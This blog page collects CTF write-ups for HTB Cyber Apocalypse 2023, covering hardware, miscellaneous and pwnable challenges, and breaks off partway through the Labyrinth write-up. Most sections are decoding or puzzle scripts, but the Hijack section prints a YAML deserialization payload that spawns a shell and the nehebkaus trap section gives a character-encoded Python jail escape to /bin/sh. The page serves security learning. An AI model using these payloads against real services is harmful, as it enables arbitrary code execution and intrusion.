Lio | BKISC Blogs

Cyber Apocalypse 2023: The Cursed Mission - Hardware

Mon, 27 Mar 2023 00:00:00 +0000

ctf

writeup

hardware

htb-2023

Table of Contents

Timed transmission

Given file: Get it here!
Description: As part of your initialization sequence, your team loaded various tools into your system, but you still need to learn how to use them effectively. They have tasked you with the challenge of finding the appropriate tool to open a file containing strange serial signals. Can you rise to the challenge and find the right tool?
Category: Hardware
Difficulty: Very Easy

Problem Statement and Results

What we have is a really strange file with .sal extension. I think the hardest part in this challenge is finding the app can open this file. After searching on Google (and Chatgpt), I found a suitable app called Logic 2. Open the file and enjoy it :D

Flag is: HTB{b391N_tH3_HArdWAr3_QU3St}

Critical Flight

Given file: Get it here!
Description: Your team has assigned you to a mission to investigate the production files of Printed Circuit Boards for irregularities. This is in response to the deployment of nonfunctional DIY drones that keep falling out of the sky. The team had used a slightly modified version of an open-source flight controller in order to save time, but it appears that someone had sabotaged the design before production. Can you help identify any suspicious alterations made to the boards?
Category: Hardware
Difficulty: Very Easy

Problem Statement

Given a lot of GBR file. Our mission is to somehow find the flag :D.

Results

These files are called Gerber files - a standard file format used in the manufacturing of printed circuit boards (PCBs) to describe the PCB’s copper layers, solder mask, legend, and other features. To open this, reader can access this website: https://www.pcbway.com/project/OnlineGerberViewer.html. We can easily find all parts of the flag in this board:

Flag is: HTB{533_7h3_1nn32_w02k1n95_0f_313c720n1c5#$@}

Debug

Given file: Get it here!
Description: Your team has recovered a satellite dish that was used for transmitting the location of the relic, but it seems to be malfunctioning. There seems to be some interference affecting its connection to the satellite system, but there are no indications of what it could be. Perhaps the debugging interface could provide some insight, but they are unable to decode the serial signal captured during the device’s booting sequence. Can you help to decode the signal and find the source of the interference?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Hardware
Difficulty: Easy

Problem Statement

We received file with .sal extension - which contains a signal capture of a device. Our mission is identify which device is captured and how to decode the signal to decrypt the communication.

Solution Method

We use Logic 2 to open this file, then receive this:

There is only one channel with signals so probably we are talking about UART protocol. For doing that, first we have to calculate the baud rate (bit/s).

To calculate the baud rate in this signal we zoom into the very first signal and see the minimun period of the signal. We can see that the smallest period between two high values is 8.68us. So, 1 bit needs at least 8.68us to be transfered. The baud rate therefore must be around 115200 (bit/s). Let’s configure the analyzer with this value:

Results

The flag is showed at the terminal, after correctly analyze the signal:

Flag is: HTB{547311173_n37w02k_c0mp20m153d}

Secret Code

Given zip: Get it here!
Description: To gain access to the tomb containing the relic, you must find a way to open the door. While scanning the surrounding area for any unusual signals, you come across a device that appears to be a fusion of various alien technologies. However, the device is broken into two pieces and you are unable to see the secret code displayed on it. The device is transmitting a new character every second and you must decipher the transmitted signals in order to retrieve the code and gain entry to the tomb.
Category: Hardware
Difficulty: Easy

The challenge gave us a .sal file and a folder of .gbr files.

You can use any Gerber file viewer software to open the .gbrjob file but in my case I used KiCad and got the following circuit board.

We could clearly see that this was a typical 7-segment LED display. Tracing each channel connection to the LED itself, we got the channels corresponding to the segments on the display as follow, with channel 1 being the dot.

Next on line is the .sal file. For this I used Logic 2.

I extracted the bits from every channels one by one using channel 1 as the clock signal. I noticed that the machine was sending a hex string so I wrote a script to decode all of it.

c = [
 [0,1,1,0,0,1,0,1,0,1,1,1,0,0,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,0,0,0,1,0,1,0,1,1,1,0,1,1,0,1,1,0,1,1,0,1],
 [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
 [0,1,1,0,0,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,0,1,1,1,1,1,0,1,1,0,1,1,0,1,1,1,0],
 [1,1,1,1,1,1,0,1,0,0,1,0,0,0,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,0,0,1,0,1,0,1,1,1,0,1,1,1,0,1,0,1,1,0,1],
 [1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,0,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,1,0,1,0,1,1,1],
 [1,1,0,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,0,0,0,1,1,1,0,1,1,1,1,0,0,0,0,0,1,1,1,1,0,1,0,0,1,1,1,1,1,1,0,1,1,1,0,0,1,1,1,1,1,1,1,1],
 [0,1,0,0,0,1,0,1,0,1,0,1,0,0,0,0,0,1,0,1,1,0,0,1,1,1,0,0,0,0,0,1,1,1,0,1,0,1,1,1,0,1,0,0,0,0,0,0,1,1,0,0,1,1,0,1,1,0,1,0,0,1],
 [1,1,1,1,1,0,0,1,0,1,0,1,0,0,0,0,0,0,1,1,1,0,0,1,1,0,0,0,0,1,1,1,1,1,0,0,0,1,1,0,1,1,0,0,0,0,0,0,1,1,0,0,1,1,1,1,0,0,0,0,0,0]
]

flag = ""
for i in range(len(c[0])):
 if c[0][i] == 0 and c[2][i] == 0 and c[3][i] == 0 and c[4][i] == 1 and c[5][i] == 1 and c[6][i] == 0 and c[7][i] == 0:
 flag += '1'
 elif c[0][i] == 1 and c[2][i] == 1 and c[3][i] == 1 and c[4][i] == 0 and c[5][i] == 1 and c[6][i] == 1 and c[7][i] == 0:
 flag += '2'
 elif c[0][i] == 1 and c[2][i] == 1 and c[3][i] == 1 and c[4][i] == 1 and c[5][i] == 1 and c[6][i] == 0 and c[7][i] == 0:
 flag += '3'
 elif c[0][i] == 0 and c[2][i] == 0 and c[3][i] == 1 and c[4][i] == 1 and c[5][i] == 1 and c[6][i] == 0 and c[7][i] == 1:
 flag += '4'
 elif c[0][i] == 1 and c[2][i] == 1 and c[3][i] == 1 and c[4][i] == 1 and c[5][i] == 0 and c[6][i] == 0 and c[7][i] == 1:
 flag += '5'
 elif c[0][i] == 1 and c[2][i] == 1 and c[3][i] == 1 and c[4][i] == 1 and c[5][i] == 0 and c[6][i] == 1 and c[7][i] == 1:
 flag += '6'
 elif c[0][i] == 0 and c[2][i] == 1 and c[3][i] == 0 and c[4][i] == 1 and c[5][i] == 1 and c[6][i] == 0 and c[7][i] == 0:
 flag += '7'
 elif c[0][i] == 1 and c[2][i] == 1 and c[3][i] == 1 and c[4][i] == 1 and c[5][i] == 1 and c[6][i] == 1 and c[7][i] == 1:
 flag += '8'
 elif c[0][i] == 0 and c[2][i] == 1 and c[3][i] == 1 and c[4][i] == 1 and c[5][i] == 1 and c[6][i] == 0 and c[7][i] == 1:
 flag += '9'
 elif c[0][i] == 1 and c[2][i] == 1 and c[3][i] == 0 and c[4][i] == 1 and c[5][i] == 1 and c[6][i] == 1 and c[7][i] == 1:
 flag += '0'
 elif c[0][i] == 1 and c[2][i] == 0 and c[3][i] == 1 and c[4][i] == 1 and c[5][i] == 0 and c[6][i] == 1 and c[7][i] == 1:
 flag += 'b'
 elif c[0][i] == 1 and c[2][i] == 0 and c[3][i] == 1 and c[4][i] == 1 and c[5][i] == 1 and c[6][i] == 1 and c[7][i] == 0:
 flag += 'd'
 elif c[0][i] == 1 and c[2][i] == 1 and c[3][i] == 1 and c[4][i] == 0 and c[5][i] == 0 and c[6][i] == 1 and c[7][i] == 1:
 flag += 'e'
 elif c[0][i] == 0 and c[2][i] == 1 and c[3][i] == 1 and c[4][i] == 0 and c[5][i] == 0 and c[6][i] == 1 and c[7][i] == 1:
 flag += 'f'
 else:
 print(c[0][i], c[2][i], c[3][i], c[4][i], c[5][i], c[6][i], c[7][i])

#print(flag)
print(bytes.fromhex(flag))

Flag is: HTB{p0w32_c0m35_f20m_w17h1n@!#}

Cyber Apocalypse 2023: The Cursed Mission - Miscellaneous

Mon, 27 Mar 2023 00:00:00 +0000

Table of Contents

Persistence

Description: Thousands of years ago, sending a GET request to /flag would grant immense power and wisdom. Now it’s broken and usually returns random data, but keep trying, and you might get lucky… Legends say it works once every 1000 tries.
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Miscellaneous
Difficulty: Very Easy

We are given a website to work with. Initially, connection to the website would result in “404 Not Found”. I then went to read the descriptions, and from it, I got to know that we should send at least 1000 GET requests to /flag to maybe get the flag.

I used this below Python script to automate the task.

import requests

url = "http://64.227.41.83:30380/flag"
for i in range(10000):
 response = requests.get(url)
 content = response.content
 if b'HTB{' in content:
 print(content)
 break

After a short wait, we got the flag.

Flag is: HTB{y0u_h4v3_p0w3rfuL_sCr1pt1ng_ab1lit13S!}

Hijack

Description: The security of the alien spacecrafts did not prove very robust, and you have gained access to an interface allowing you to upload a new configuration to their ship’s Thermal Control System. Can you take advantage of the situation without raising any suspicion?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Miscellaneous
Difficulty: Easy

Let’s try to connect to the challenge instance.

And let’s try to test out those options.

ISFweXRob24vb2JqZWN0Ol9fbWFpbl9fLkNvbmZpZyB7SVJfc3BlY3Ryb21ldGVyX3RlbXA6ICcxNScsIGF1dG9fY2FsaWJyYXRpb246ICdvbicsCiAgcHJvcHVsc2lvbl90ZW1wOiAnMzQzNCcsIHNvbGFyX2FycmF5X3RlbXA6ICcxMicsIHVuaXRzOiBmfQo=

The function in question generates a base64 encoded string representing a serialized object. To provide some context, serialization is the process of storing an object, such as an array or class, in a database for later retrieval. When the application needs to access the object, it unserializes it, or loads it from the database using a function. This can improve the efficiency of Object-Oriented Programming.

It is important to note, however, that serialized objects should not be vulnerable to manipulation by users. If a user creates a malicious object, it could execute unwanted code. This challenge illustrates this point by presenting us with a serialized object and its corresponding base64 encoding. This is just one example of how serialized objects can be used, and it is essential to be aware of their potential risks.

Let’s take a look at the next options. The application is requesting a base64 encoded string of a serialized object.

Upon examining the serialized object provided by the application, I have determined that it is a YAML-formatted Python serialized object. This article serves as an excellent illustration of how attackers can leverage YAML-based exploits to execute arbitrary code.

Here is the script to generate a serialized object.

import yaml
import os
import base64
class Test(object):
 def __reduce__(self):
 return (os.system, ('sh',))
serialized_data = yaml.dump(Test()) # serializing data
print(base64.b64encode(serialized_data.encode()).decode())

Let’s grab the result and throw it to the application.

Flag is: HTB{1s_1t_ju5t_m3_0r_iS_1t_g3tTing_h0t_1n_h3r3?}

Restricted

Given file: Get it here!
Description: You ’re still trying to collect information for your research on the alien relic. Scientists contained the memories of ancient egyptian mummies into small chips, where they could store and replay them at will. Many of these mummies were part of the battle against the aliens and you suspect their memories may reveal hints to the location of the relic and the underground vessels. You managed to get your hands on one of these chips but after you connected to it, any attempt to access its internal data proved futile. The software containing all these memories seems to be running on a restricted environment which limits your access. Can you find a way to escape the restricted environment?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Miscellaneous
Difficulty: Easy

We are provided with a server and it’s source. From the source, we know that it is a SSH server.

One thing particular about this server is that, if the username is restricted, we will not need to provide a password to authenticate, but the user will be in restricted shell mode.

To cope with this, we can use a trick called SSH self loop-back, which means we initiate a SSH connection inside a SSH, since restricted shell doesn’t prevent us from using SSH commands.

First, we connect to the SSH server using the username restricted.

From the source, we also know that the exposed port is 1337. Then, we can use SSH self loop-back to have the permission to use cat, since we also know that flag.txt is changed to flag_* (with * represents some random bytes) and lies in plainsight.

Flag is: HTB{r35tr1ct10n5_4r3_p0w3r1355}

Remote computation

Description: The alien species use remote machines for all their computation needs. Pandora managed to hack into one, but broke its functionality in the process. Incoming computation requests need to be calculated and answered rapidly, in order to not alarm the aliens and ultimately pivot to other parts of their network. Not all requests are valid though, and appropriate error messages need to be sent depending on the type of error. Can you buy us some time by correctly responding to the next 500 requests?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Miscellaneous
Difficulty: Easy

The program asked us to calculate 500 math expressions with the following conditions.

Results
---
All results are rounded
to 2 digits after the point.
ex. 9.5752 -> 9.58

Error Codes
---
* Divide by 0:
This may be alien technology,
but dividing by zero is still an error!
Expected response: DIV0_ERR

* Syntax Error
Invalid expressions due syntax errors.
ex. 3 +* 4 = ?
Expected response: SYNTAX_ERR

* Memory Error
The remote machine is blazingly fast,
but its architecture cannot represent any result
outside the range -1337.00 <= RESULT <= 1337.00
Expected response: MEM_ERR

At first I tried to round the numbers the mathematical way but then I realised the remote server was using the round() function of python the whole time.

So yeah here’s the solve script.

from decimal import Decimal, ROUND_HALF_UP, ROUND_HALF_DOWN
from pwn import *

io = remote('144.126.196.198', 30843)
print(io.recvuntil(b'>'))
io.sendline(b'1')
print(io.recvuntil(b'...'))
for _ in range(500):
 node = io.recvuntil(b']')
 if b'!' in node:
 log.info("BRUH!!!!!!!!!!!") # In case something goes wrong (and it did)
 break
 print(node)
 io.recv(2)
 equation = io.recvuntil(b'=')[:-1].decode()
 print(equation, end='=')
 print(io.recvuntil(b'>'))
 try:
 cal = eval(equation)
 if cal < -1337 or cal > 1337:
 log.info('MEM_ERR')
 io.sendline(b"MEM_ERR")
 else:
 res = round(cal, 2)
 # if cal >= 0:
 # res = Decimal(str(cal)).quantize(Decimal('1.00'), rounding=ROUND_HALF_UP)
 # else:
 # res = Decimal(str(cal)).quantize(Decimal('1.00'), rounding=ROUND_HALF_DOWN)
 log.info('SUCCESS WITH RESULT: {}'.format(str(res)))
 io.sendline(str(res).encode())
 except SyntaxError:
 log.info('SYNTAX_ERR')
 io.sendline(b"SYNTAX_ERR")
 except ZeroDivisionError:
 log.info('DIV0_ERR')
 io.sendline(b"DIV0_ERR")
io.interactive()

Flag is: HTB{d1v1d3_bY_Z3r0_3rr0r}

Janken

Given file: Get it here!
Description: As you approach an ancient tomb, you’re met with a wise guru who guards its entrance. In order to proceed, he challenges you to a game of Janken, a variation of rock paper scissors with a unique twist. But there’s a catch: you must win 100 rounds in a row to pass. Fail to do so, and you’ll be denied entry.
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Miscellaneous
Difficulty: Easy

There are 2 noticable functions called within main() which is game() and get_prize().

The get_prize() function simply gives us the flag so we won’t go too deep into it. But in order for this function to be called. We have to win 100 games of rock, paper, scissors. A.K.A. the game() function.

Having analyzed it, we got the following code:

int game()
{
 unsigned int v0; // eax
 size_t i; // [rsp+0h] [rbp-80h]
 __int64 v3; // [rsp+8h] [rbp-78h]
 __int64 v4[4]; // [rsp+10h] [rbp-70h]
 char *needle[4]; // [rsp+30h] [rbp-50h]
 __int64 buf[6]; // [rsp+50h] [rbp-30h] BYREF

 buf[5] = __readfsqword(0x28u);
 v0 = time(0LL);
 srand(v0);
 v3 = rand() % 3;
 v4[0] = (__int64)"rock";
 v4[1] = (__int64)"scissors";
 v4[2] = (__int64)"paper";
 memset(buf, 0, 32);
 needle[0] = "paper";
 needle[1] = "rock";
 needle[2] = "scissors";
 fwrite(&unk_2540, 1uLL, 0x33uLL, stdout);
 read(0, buf, 31uLL);
 fprintf(
 stdout,
 "\n[!] Guru's choice: %s%s%s\n[!] Your choice: %s%s%s",
 "\x1B[1;31m",
 (const char *)v4[v3],
 "\x1B[1;36m",
 "\x1B[1;32m",
 (const char *)buf,
 "\x1B[1;36m");
 for ( i = 0LL; i < strlen((const char *)buf); ++i )
 {
 if ( ((*__ctype_b_loc())[*((char *)buf + i)] & ' \0') != 0 )
 {
 *((_BYTE *)buf + i) = 0;
 break;
 }
 }
 if ( !strstr((const char *)buf, needle[v3]) )
 {
 fprintf(stdout, "%s\n[-] You lost the game..\n\n", "\x1B[1;31m");
 exit(22);
 }
 return fprintf(stdout, "\n%s[+] You won this round! Congrats!\n%s", "\x1B[1;32m", "\x1B[1;36m");
}

We noticed that the program (Guru) chooses a random number from 0 to 2, which is rock, paper, scissors accordingly. It then checks if our input contains the string that can win against its choice using the strstr() function.

In other words, if Guru chooses rock, then if our input contain the string paper, we win.

We can exploit the strstr() by spamming rockpaperscissors 100 times or write a script to do it for us.

from pwn import *

io = remote('68.183.37.122', 32161)
print(io.recv())
io.sendline(b'1')
for _ in range(100):
 print(io.recv())
 io.sendline(b'rockpaperscissors')
io.interactive()

Flag is: HTB{r0ck_p4p3R_5tr5tr_l0g1c_buG}

nehebkaus trap

Description: In search of the ancient relic, you go looking for the Pharaoh’s tomb inside the pyramids. A giant granite block falls and blocks your exit, and the walls start closing in! You are trapped. Can you make it out alive and continue your quest?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Miscellaneous
Difficulty: Medium

A classic pyjail challenge with no source code. It filtered out some special characters like ' " _ . / so we couldn’t directly execute any code.

One way to bypass this is to break down the string of code we want to execute into individual characters and concatenate them together using the + operator.

We can bypass the ' and " filter simply by using chr(hex-value-of-the-ascii-character) to make the character we want.

For this I used eval("__import__('os').system('/bin/sh')"). The payload for this is:

eval(chr(0x5f)+chr(0x5f)+chr(0x69)+chr(0x6d)+chr(0x70)+chr(0x6f)+chr(0x72)+chr(0x74)+chr(0x5f)+chr(0x5f)+chr(0x28)+chr(0x27)+chr(0x6f)+chr(0x73)+chr(0x27)+chr(0x29)+chr(0x2e)+chr(0x73)+chr(0x79)+chr(0x73)+chr(0x74)+chr(0x65)+chr(0x6d)+chr(0x28)+chr(0x27)+chr(0x2f)+chr(0x62)+chr(0x69)+chr(0x6e)+chr(0x2f)+chr(0x73)+chr(0x68)+chr(0x27)+chr(0x29))

Now with all the pieces together, let’s send our exploit.

Flag is: HTB{y0u_d3f34t3d_th3_sn4k3_g0d!}

The Chasm’s Crossing Conundrum

Description: As you and your trusty team of local pyramid experts stand at the precipice of the chasm, you catch a glimpse of the otherworldly relic glowing tantalizingly in the distance. But the final obstacle looms ahead - a narrow, unstable bridge that threatens to send you all tumbling into the depths below. It won’t hold all of you at once. Time is running out, and the charge on your flashlight is dwindling. The chasm seems to be closing in, as if it’s trying to swallow you whole. With each step, you feel the weight of the task at hand. The fate of your team, and perhaps even the world, rests on your shoulders. Can you summon the courage and skill to make it across in time, and claim the relic that lies just beyond your grasp?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Miscellaneous
Difficulty: Hard

Classic bridge and torch problem. Here’s the instruction of the game.

☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠
☠ ☠
☠ [*] The path ahead is treacherous. ☠
☠ [*] You have to find a viable strategy to get everyone across safely. ☠
☠ [*] The bridge can hold a maximum of two persons. ☠
☠ [*] The chasm lurks on either side of the bridge waiting for those ☠
☠ who think they can get across in total darkness. ☠
☠ [*] If two persons get across, one must come back with the flashlight. ☠
☠ [*] The flashlight has energy only for a limited amount of time. ☠
☠ [*] The time required for two persons to cross, is dictated by the slower. ☠
☠ [*] The answer must be given in crossing and returning pairs. For example, ☠
☠ [1,2],[2],... . This means that persons 1 and 2 cross and 2 gets back ☠
☠ with the flashlight so others can cross. ☠
☠ ☠
☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠

There’s only one optimal solution for every number of people. You can find it everywhere on the internet so I won’t write it here.

One thing I noticed that the program only has 3 cases which is 6, 7 or 8 people. So instead of writing the general solution, I solved each cases individually.

Here’s the script.

from pwn import *

# take second element for sort
def takeSecond(elem):
 return elem[1]

def man8(elem):
 res = f'[{elem[0][0]},{elem[1][0]}],[{elem[0][0]}],[{elem[6][0]},{elem[7][0]}],[{elem[1][0]}],'
 res += f'[{elem[0][0]},{elem[1][0]}],[{elem[0][0]}],[{elem[4][0]},{elem[5][0]}],[{elem[1][0]}],'
 res += f'[{elem[0][0]},{elem[1][0]}],[{elem[0][0]}],[{elem[2][0]},{elem[3][0]}],[{elem[1][0]}],'
 res += f'[{elem[0][0]},{elem[1][0]}]'
 return res.encode()

def man6(elem):
 res = f'[{elem[0][0]},{elem[1][0]}],[{elem[0][0]}],[{elem[4][0]},{elem[5][0]}],[{elem[1][0]}],'
 res += f'[{elem[0][0]},{elem[1][0]}],[{elem[0][0]}],[{elem[2][0]},{elem[3][0]}],[{elem[1][0]}],'
 res += f'[{elem[0][0]},{elem[1][0]}]'
 return res.encode()

def man7(elem):
 res = f'[{elem[0][0]},{elem[1][0]}],[{elem[0][0]}],[{elem[5][0]},{elem[6][0]}],[{elem[1][0]}],'
 res += f'[{elem[0][0]},{elem[1][0]}],[{elem[0][0]}],[{elem[3][0]},{elem[4][0]}],[{elem[1][0]}],'
 res += f'[{elem[0][0]},{elem[1][0]}],[{elem[0][0]}],[{elem[0][0]},{elem[2][0]}]'
 return res.encode()

# list
person = []

io = remote('68.183.37.122', 31392)
io.recvuntil(b'> ')
io.sendline(b'2')
io.recvuntil(b'flashlight.\n\n')
while(1):
 per = io.recvline(keepends=False)
 if b'flashlight' in per:
 break
 per = per.decode().split()
 person.append((int(per[1]), int(per[4])))
person.sort(key=takeSecond)
if len(person)==8:
 ret = man8(person)
elif len(person)==7:
 ret = man7(person)
else:
 ret = man6(person)
print(ret)
io.recvuntil(b'> ')
io.sendline(ret)
io.interactive()

Flag is: HTB{4cro55_th3_br1dg3_4nd_th3_ch4sm_l13s_th3_tr34sur3}

Original Posts

From FazeCT

Cyber Apocalypse 2023: The Cursed Mission - Pwnable

Mon, 27 Mar 2023 00:00:00 +0000

Table of Contents

Initialise Connection

Description: In order to proceed, we need to start with the basics. Start an instance, connect to it via $ nc e.g. nc 127.0.0.1 1337 and send “1” to get the flag.
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Binary Exploitation/Pwnable
Difficulty: Very Easy

Just a sanity check challenge, do the same thing that is being stated in the description will grant you the flag.

Flag is: HTB{g3t_r34dy_f0r_s0m3_pwn}

Questionnaire

Given file: Get it here!
Description: It’s time to learn some things about binaries and basic c. Connect to a remote server and answer some questions to get the flag.
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Binary Exploitation/Pwnable
Difficulty: Very Easy

We are given a binary, a C file and a netcat server to answer some questions.

From the netcat, we are given some informations about the binary that we will going to work with.

When compiling C/C++ source code in Linux, an ELF (Executable and Linkable Format) file is created.
The flags added when compiling can affect the binary in various ways, like the protections.
Another thing affected can be the architecture and the way it's linked.

If the system in which the challenge is compiled is x86_64 and no flag is specified,
the ELF would be x86-64 / 64-bit. If it's compiled with a flag to indicate the system,
it can be x86 / 32-bit binary.

To reduce its size and make debugging more difficult, the binary can be stripped or not stripped.

Dynamic linking:

A pointer to the linked file is included in the executable, and the file contents are not included
at link time. These files are used when the program is run.

Static linking:

The code for all the routines called by your program becomes part of the executable file.

Stripped:

The binary does not contain debugging information.

Not Stripped:

The binary contains debugging information.

The most common protections in a binary are:

Canary: A random value that is generated, put on the stack, and checked before that function is
left again. If the canary value is not correct-has been changed or overwritten, the application will
immediately stop.

NX: Stands for non-executable segments, meaning we cannot write and execute code on the stack.

PIE: Stands for Position Independent Executable, which randomizes the base address of the binary
as it tells the loader which virtual address it should use.

RelRO: Stands for Relocation Read-Only. The headers of the binary are marked as read-only.

Run the 'file' command in the terminal and 'checksec' inside the debugger.

The output of 'file' command:

✗ file test
test: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked,
interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=5a83587fbda6ad7b1aeee2d59f027a882bf2a429,
for GNU/Linux 3.2.0, not stripped.

The output of 'checksec' command:

gef➤ checksec
Canary : ✘
NX : ✓
PIE : ✘
Fortify : ✘
RelRO : Partial

We are able to answer some first questions using these informations.

After answering these questions correctly, we are provided with more informations about the binary.

Great job so far! Now it's time to see some C code and a binary file.

In the pwn_questionnaire.zip there are two files:

1. test.c
2. test

The 'test.c' is the source code and 'test' is the output binary.

Let's start by analyzing the code.
First of all, let's focus on the '#include <stdio.h>' line.
It includes the 'stdio.h' header file to use some of the standard functions like 'printf()'.
The same principle applies for the '#include <stdlib.h>' line, for other functions like 'system()'.

Now, let's take a closer look at:

void main(){
 vuln();
}

By default, a binary file starts executing from the 'main()' function.

In this case, 'main()' only calls another function, 'vuln()'.
The function 'vuln()' has 3 lines.

void vuln(){
 char buffer[0x20] = {0};
 fprintf(stdout, "\nEnter payload here: ");
 fgets(buffer, 0x100, stdin);
}

The first line declares a 0x20-byte buffer of characters and fills it with zeros.
The second line calls 'fprintf()' to print a message to stdout.
Finally, the third line calls 'fgets()' to read 0x100 bytes from stdin and store them to the
aformentioned buffer.

Then, there is a custom 'gg()' function which calls the standard 'system()' function to print the
flag. This function is never called by default.

void gg(){
 system("cat flag.txt");
}

Run the 'man <function_name>' command to see the manual page of a standard function (e.g. man fgets).

We are also able to answer some next questions using these informations.

After answering these questions correctly, we are provided with MORE and MORE informations about the binary.

Excellent! Now it's time to talk about Buffer Overflows.

Buffer Overflow means there is a buffer of characters, integers or any other type of variables,
and someone inserts into this buffer more bytes than it can store.

If the user inserts more bytes than the buffer's size, they will be stored somewhere in the memory
after the address of the buffer, overwriting important addresses for the flow of the program.
This, in most cases, will make the program crash.

When a function is called, the program knows where to return because of the 'return address'. If the
player overwrites this address, they can redirect the flow of the program wherever they want.
To print a function's address, run 'p <function_name>' inside 'gdb'. (e.g. p main)

gef➤ p gg
$1 = {<text variable, no debug info>} 0x401176 <gg>

To perform a Buffer Overflow in the simplest way, we take these things into consideration.

1. Canary is disabled so it won't quit after the canary address is overwritten.
2. PIE is disabled so the addresses of the binary functions are not randomized and the user knows
 where to return after overwritting the return address.
3. There is a buffer with N size.
4. There is a function that reads to this buffer more than N bytes.

Run printf 'A%.0s' {1..30} | ./test to enter 30*"A" into the program.

Run the program manually with "./test" and insert 30*A, then 39, then 40 and see what happens.

We are able to answer some next questions using these informations.

For the above question, you can try out to see for yourself.

And there is our flag!

Flag is: HTB{th30ry_bef0r3_4cti0n}

Getting Started

Given file: Get it here!
Description: Get ready for the last guided challenge and your first real exploit. It’s time to show your hacking skills.
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Binary Exploitation/Pwnable
Difficulty: Very Easy

We are given a binary, a C file and a netcat server to work with.

Same with the above challenge, netcat tells us to fill in some questions.

Stack frame layout

| . | <- Higher addresses
| . |
|_____________|
| | <- 64 bytes
| Return addr |
|_____________|
| | <- 56 bytes
| RBP |
|_____________|
| | <- 48 bytes
| target |
|_____________|
| | <- 40 bytes
| alignment |
|_____________|
| | <- 32 bytes
| Buffer[31] |
|_____________|
| . |
| . |
|_____________|
| |
| Buffer[0] |
|_____________| <- Lower addresses


 [Addr] | [Value]
-------------------+-------------------
0x00007fff1ca33230 | 0x0000000000000000 <- Start of buffer
0x00007fff1ca33238 | 0x0000000000000000
0x00007fff1ca33240 | 0x0000000000000000
0x00007fff1ca33248 | 0x0000000000000000
0x00007fff1ca33250 | 0x6969696969696969 <- Dummy value for alignment
0x00007fff1ca33258 | 0x00000000deadbeef <- Target to change
0x00007fff1ca33260 | 0x000055cf39fcf800 <- Saved rbp
0x00007fff1ca33268 | 0x00007f62c548ac87 <- Saved return address
0x00007fff1ca33270 | 0x0000000000000001
0x00007fff1ca33278 | 0x00007fff1ca33348


After we insert 4 "A"s, (the hex representation of A is 0x41), the stack layout like this:


 [Addr] | [Value]
-------------------+-------------------
0x00007fff1ca33230 | 0x0000000041414141 <- Start of buffer
0x00007fff1ca33238 | 0x0000000000000000
0x00007fff1ca33240 | 0x0000000000000000
0x00007fff1ca33248 | 0x0000000000000000
0x00007fff1ca33250 | 0x6969696969696969 <- Dummy value for alignment
0x00007fff1ca33258 | 0x00000000deadbeef <- Target to change
0x00007fff1ca33260 | 0x000055cf39fcf800 <- Saved rbp
0x00007fff1ca33268 | 0x00007f62c548ac87 <- Saved return address
0x00007fff1ca33270 | 0x0000000000000001
0x00007fff1ca33278 | 0x00007fff1ca33348


After we insert 4 "B"s, (the hex representation of B is 0x42), the stack layout looks like this:


 [Addr] | [Value]
-------------------+-------------------
0x00007fff1ca33230 | 0x4242424241414141 <- Start of buffer
0x00007fff1ca33238 | 0x0000000000000000
0x00007fff1ca33240 | 0x0000000000000000
0x00007fff1ca33248 | 0x0000000000000000
0x00007fff1ca33250 | 0x6969696969696969 <- Dummy value for alignment
0x00007fff1ca33258 | 0x00000000deadbeef <- Target to change
0x00007fff1ca33260 | 0x000055cf39fcf800 <- Saved rbp
0x00007fff1ca33268 | 0x00007f62c548ac87 <- Saved return address
0x00007fff1ca33270 | 0x0000000000000001
0x00007fff1ca33278 | 0x00007fff1ca33348

From the netcat, we are provided with these informations.

We can answer the question by looking at the informations given, where we have to overwrite the alignment address and the “target’s” 0xdeadbeef value.

From the stack layout given above, we can see that to fully overwrite, we need at least 40 bytes input (assume that we use Linux terminal because there will be a \x00 overwrite at the right of the “target’s” 0xdeadbeef value) which will look like this.

I don’t know why it prints out "[-] You failed!" though…

Flag is: HTB{b0f_s33m5_3z_r1ght?}

Labyrinth

Given file: Get it here!
Description: You find yourself trapped in a mysterious labyrinth, with only one chance to escape. Choose the correct door wisely, for the wrong choice could have deadly consequences.
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Binary Exploitation/Pwnable
Difficulty: Easy

Examine the binary with command checksec

[*] '~/pwn_labyrinth/challenge/labyrinth'
 Arch: amd64-64-little
 RELRO: Full RELRO
 Stack: No canary found
